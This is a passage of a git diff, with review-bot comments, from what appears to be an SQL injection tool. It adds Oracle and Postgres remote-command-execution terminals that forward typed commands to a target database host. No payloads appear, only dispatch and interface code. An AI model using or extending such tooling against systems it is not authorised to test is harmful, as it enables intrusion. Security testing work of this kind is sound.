&& MediatorHelper.model().getMediatorVendor().getVendor() != MediatorHelper.model().getMediatorVendor().getOracle() ) { LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Unsupported for [{}], choose an Oracle target instead", MediatorHelper.model().getMediatorVendor().getVendor()); 
@@ -356,10 +372,12 @@ protected void createPayload(String remotePathFolder, String urlShell, File file } var modelItemType = Objects.requireNonNull((ModelItemType) this.comboBoxExploitTypes.getSelectedItem()); - if (ManagerExploit.EXPLOIT_UDF.equals(modelItemType.getKeyLabel())) { + if (ManagerExploit.EXPLOIT_UDF_MYSQL.equals(modelItemType.getKeyLabel())) { MediatorHelper.model().getUdfAccess().createUdf(pathNetshare, exploitMethod); - } else if (ManagerExploit.EXPLOIT_RCE.equals(modelItemType.getKeyLabel())) { - MediatorHelper.model().getUdfAccess().createExploitRce(exploitMethod); + } else if (ManagerExploit.EXPLOIT_RCE_ORACLE.equals(modelItemType.getKeyLabel())) { + MediatorHelper.model().getUdfAccess().createExploitRceOracle(exploitMethod); + } else if (ManagerExploit.EXPLOIT_RCE_POSTGRES.equals(modelItemType.getKeyLabel())) { + MediatorHelper.model().getUdfAccess().createExploitRcePostgres(exploitMethod); } else if (ManagerExploit.EXPLOIT_WEB_MYSQL.equals(modelItemType.getKeyLabel())) { MediatorHelper.model().getResourceAccess().createExploitWebMysql( remotePathFolder, diff --git a/view/src/main/java/com/jsql/view/swing/panel/preferences/PanelTampering.java b/view/src/main/java/com/jsql/view/swing/panel/preferences/PanelTampering.java index ba9e43e685..4b3a9afe0d 100644 --- a/view/src/main/java/com/jsql/view/swing/panel/preferences/PanelTampering.java +++ b/view/src/main/java/com/jsql/view/swing/panel/preferences/PanelTampering.java @@ -14,7 +14,6 @@ import org.fife.ui.rtextarea.RTextScrollPane; import javax.swing.*; -import java.awt.*; import java.util.AbstractMap.SimpleEntry; import java.util.Arrays; import java.util.stream.Stream; diff --git a/view/src/main/java/com/jsql/view/swing/tab/TabResults.java b/view/src/main/java/com/jsql/view/swing/tab/TabResults.java index 06ec650cc3..66fe0630f5 100644 --- a/view/src/main/java/com/jsql/view/swing/tab/TabResults.java +++ b/view/src/main/java/com/jsql/view/swing/tab/TabResults.java 
@@ -18,10 +18,7 @@ import com.jsql.view.swing.action.ActionCloseTabResult; import com.jsql.view.swing.action.HotkeyUtil; import com.jsql.view.swing.popupmenu.JPopupMenuText; -import com.jsql.view.swing.terminal.ExploitRce; -import com.jsql.view.swing.terminal.ExploitSql; -import com.jsql.view.swing.terminal.ExploitUdf; -import com.jsql.view.swing.terminal.ExploitWeb; +import com.jsql.view.swing.terminal.*; import com.jsql.view.swing.tab.dnd.DnDTabbedPane; import com.jsql.view.swing.tab.dnd.TabTransferHandler; import com.jsql.view.swing.table.PanelTable; @@ -164,10 +161,30 @@ public void addTabExploitUdf() { } } - public void addTabExploitRce() { + public void addTabExploitRceOracle() { try { var terminalID = UUID.randomUUID(); - var terminal = new ExploitRce(terminalID); + var terminal = new ExploitRceOracle(terminalID); + MediatorHelper.frame().getMapUuidShell().put(terminalID, terminal); + + JScrollPane scroller = new JScrollPane(terminal); + this.addTab("RCE shell", scroller); + this.setSelectedComponent(scroller); // Focus on the new tab + + var header = new TabHeader("RCE shell", UiUtil.TERMINAL.getIcon()); + this.setTabComponentAt(this.indexOfComponent(scroller), header); + terminal.requestFocusInWindow(); + + this.updateUI(); // required: light, open/close prefs, dark => light artifacts + } catch (MalformedURLException | URISyntaxException e) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, TabResults.TAB_EXPLOIT_FAILURE_INCORRECT_URL, e); + } + } + + public void addTabExploitRcePostgres() { + try { + var terminalID = UUID.randomUUID(); + var terminal = new ExploitRcePostgres(terminalID); MediatorHelper.frame().getMapUuidShell().put(terminalID, terminal); JScrollPane scroller = new JScrollPane(terminal); 
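Review bot: `addTabExploitRceOracle()` labels its tab and header `"RCE shell"`, and `addTabExploitRcePostgres()` appears to be a copy of the same body with only the terminal class changed (its remainder lies outside this hunk), so terminals opened against different databases would likely carry identical titles. Since whatever is typed there is executed on the remote host, the tab should say which target it drives, e.g. `this.addTab("Oracle RCE shell", scroller);` with the matching `new TabHeader("Oracle RCE shell", UiUtil.TERMINAL.getIcon())`, and the Postgres equivalent in the other method. The first hunk also replaces four explicit imports with `import com.jsql.view.swing.terminal.*;`; keeping the explicit list and adding only `ExploitRceOracle` and `ExploitRcePostgres` shows which terminal classes this file depends on.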
diff --git a/view/src/main/java/com/jsql/view/swing/terminal/ExploitRce.java b/view/src/main/java/com/jsql/view/swing/terminal/ExploitRceOracle.java similarity index 64% rename from view/src/main/java/com/jsql/view/swing/terminal/ExploitRce.java rename to view/src/main/java/com/jsql/view/swing/terminal/ExploitRceOracle.java index bd7cc33201..2d99b6d260 100644 --- a/view/src/main/java/com/jsql/view/swing/terminal/ExploitRce.java +++ b/view/src/main/java/com/jsql/view/swing/terminal/ExploitRceOracle.java @@ -19,19 +19,19 @@ /** * A terminal for web shell injection. */ -public class ExploitRce extends AbstractExploit { +public class ExploitRceOracle extends AbstractExploit { /** * Build a webshell instance. - * @param terminalID Unique identifier to discriminate beyond multiple opened terminals + * @param terminalId Unique identifier to discriminate beyond multiple opened terminals */ - public ExploitRce(UUID terminalID) throws MalformedURLException, URISyntaxException { - super(terminalID, null, "udf"); - this.setName("udfShell"); + public ExploitRceOracle(UUID terminalId) throws MalformedURLException, URISyntaxException { + super(terminalId, null, "rce"); + this.setName("rceShell"); } @Override - public void action(String command, UUID terminalID, String urlShell, String... arg) { - MediatorHelper.model().getUdfAccess().runCommandRce(command, terminalID); + public void action(String command, UUID terminalId, String urlShell, String... arg) { + MediatorHelper.model().getUdfAccess().runCommandRceOracle(command, terminalId); } } diff --git a/view/src/main/java/com/jsql/view/swing/terminal/ExploitRcePostgres.java b/view/src/main/java/com/jsql/view/swing/terminal/ExploitRcePostgres.java new file mode 100644 index 0000000000..eb466395c3 --- /dev/null +++ b/view/src/main/java/com/jsql/view/swing/terminal/ExploitRcePostgres.java 
@@ -0,0 +1,37 @@
+/*******************************************************************************
+ * Copyhacked (H) 2012-2025.
+ * This program and the accompanying materials
+ * are made available under no term at all, use it like
+ * you want, but share and discuss it
+ * every time possible with every body.
+ *
+ * Contributors:
+ * ron190 at ymail dot com - initial implementation
+ ******************************************************************************/
+package com.jsql.view.swing.terminal;
+
+import com.jsql.view.swing.util.MediatorHelper;
+
+import java.net.MalformedURLException;
+import java.net.URISyntaxException;
+import java.util.UUID;
+
+/**
+ * A terminal for web shell injection.
+ */
+public class ExploitRcePostgres extends AbstractExploit {
+
+ /**
+ * Build a webshell instance.
+ * @param terminalId Unique identifier to discriminate beyond multiple opened terminals
+ */
+ public ExploitRcePostgres(UUID terminalId) throws MalformedURLException, URISyntaxException {
+ super(terminalId, null, "rce");
+ this.setName("rceShell");
+ }
+
+ @Override
+ public void action(String command, UUID terminalId, String urlShell, String... arg) {
+ MediatorHelper.model().getUdfAccess().runCommandRcePostgres(command, terminalId);
+ }
+}
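Review bot: The class and constructor comments in ExploitRcePostgres, `A terminal for web shell injection.` and `Build a webshell instance.`, are carried over from the web-shell terminal, but `action()` here ignores `urlShell` and `arg` and forwards the command to `getUdfAccess().runCommandRcePostgres(command, terminalId)`. I would reword them, e.g. `A terminal that runs commands on the database host through the Postgres RCE exploit.` and `Build a Postgres RCE terminal.`, and add a line on `action` stating that `urlShell` and `arg` are unused. The renamed `ExploitRceOracle` in the previous file section keeps the same stale comments, and both classes call `setName("rceShell")`, so if that name is used to look components up (not visible here) the two terminals cannot be told apart.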